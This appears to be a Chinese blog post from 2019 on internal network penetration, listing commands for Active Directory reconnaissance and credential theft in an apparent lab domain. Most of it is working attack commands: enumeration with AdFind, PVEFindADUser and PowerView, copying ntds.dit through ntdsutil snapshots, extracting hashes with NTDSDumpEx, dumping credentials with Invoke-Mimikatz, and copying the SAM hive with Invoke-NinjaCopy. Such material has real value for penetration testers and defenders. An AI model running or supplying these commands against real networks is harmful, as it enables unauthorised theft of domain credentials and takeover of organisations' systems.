内网渗透----域内信息收集

工具使用

Nslookup

nslookup                               # 进入交互式界面
set type=all                           # 设置记录类型,可以设置为srv
_ldap._tcp.dc._msdcs.school.com        # 执行查询

在这里插入图片描述

ADFind.exe

列出域控列表

Adfind.exe -sc dclist

在这里插入图片描述

查询域中活动的主机,输出主机名和域名

AdFind.exe -sc computers_active name dnshostname

在这里插入图片描述
查询域中活动的主机详细信息

AdFind.exe -b dc=qianxiao996,dc=com -f "objectcategory=computer"

在这里插入图片描述
查询域管理员账户(未成功)

AdFind.exe -b cn="domain admins",dc=qianxaio996,dc=com member

在这里插入图片描述

从结果中筛选出SPN及域名

Adfind -sc computers_active servicePrincipalName dnshostname

在这里插入图片描述

PVEFindADUser.exe

显示每台计算机上登录的用户

PVEFindaduser -current  -noping

在这里插入图片描述

查看192.168.91.133主机上登录的用户

PVEFindADuser  -current  -target 192.168.91.133

在这里插入图片描述

查看每台计算机上次登录的用户

PVEFindADuser  -last

在这里插入图片描述

Netview.exe

netview.exe -f ip.txt

在这里插入图片描述

Netsess.exe

NetSess.exe

在这里插入图片描述

csvde.exe (域控)

在域控上使用csvde导出用户信息、域成员主机信息,域管理员信息
用户信息:

csvde.exe -d "cn=users,dc=com" -r "objextclass=user" -f .\Desktop\1.csv

在这里插入图片描述

域成员主机信息:
在这里插入图片描述

域管理员信息:
在这里插入图片描述

导出域控中用户HASH

ntdsutil(必须以管理员运行cmd)

ntdsutil snapshot "activate instance ntds" create quit quit

在这里插入图片描述

记得把快照保存下来

ntdsutil snapshot "mount {GUID}" quit quit

在这里插入图片描述

将文件复制出来
在这里插入图片描述

ntdsutil snapshot "unmount {GUID}" quit quit
ntdsutil snapshot " delete {GUID} " quit quit

在这里插入图片描述

Ntdsdumpex.exe

域控上运行:

NTDSDumpEx.exe -r -d C:\Users\Aministrator\Desktop\ntds.dit –o hash.txt

在这里插入图片描述
本地运行:

Ntdsdumpex.exe -r

在这里插入图片描述

NTDSDumpEx.exe -k 4D54B7E7F7C6541D4FF486B8A83DC5B1 -d ntds.dit -o hash.txt

PowerSploit的使用

Invoke-Mimikatz(依赖管理员)

Import-Module .\invoke-mimikatz.ps1
Invoke-Mimikatz –DumpCreds

在这里插入图片描述
使用Invoke-Mimikatz –command “mimikatz命令”来执行命令:

Invoke-Mimikatz –command "token::elevate"

在这里插入图片描述

Invoke-Ninjacopy (依赖管理员)

直接拷贝系统文件:
在这里插入图片描述

Import-Module .\invoke-ninjacopy.ps1
invoke-ninjacopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\administrator\Desktop\SAM

在这里插入图片描述

Get-System (依赖管理员)

Import-Module .\Get-System 
get-system

在这里插入图片描述

Invoke-Portscan

扫描Top50端口:

Invoke-Portscan –Hosts ip地址 –TopPorts 50

在这里插入图片描述
扫描特定端口:

Invoke-Portscan –Hosts ip地址 –Ports 端口

在这里插入图片描述

Invoke-ReverseDnsLookup

反向解析IP地址:

Import-Module .\Invoke-ReverseDnsLookup.ps1
Invoke-ReverseDnsLookup 192.168.91.131

在这里插入图片描述

Invoke-Wmicommand

Import-Module .\Invoke-Wmicommand.ps1
Invoke-Wmicommand -Payload {whoami}

在这里插入图片描述

Get-NetDomain

Import-Module .\PowerView.ps1
Get-NetDomain

在这里插入图片描述

Get-NetDomainController

get-NetDomainController

在这里插入图片描述

Invoke-ProcessHunter –ProcessName 进程名
Invoke-ProcessHunter –ProcessName powershell

在这里插入图片描述

Get-NetShare获取共享信息

get-netshare

在这里插入图片描述

posted @ 2019-04-14 18:17  浅笑996  阅读(528)  评论(0编辑  收藏  举报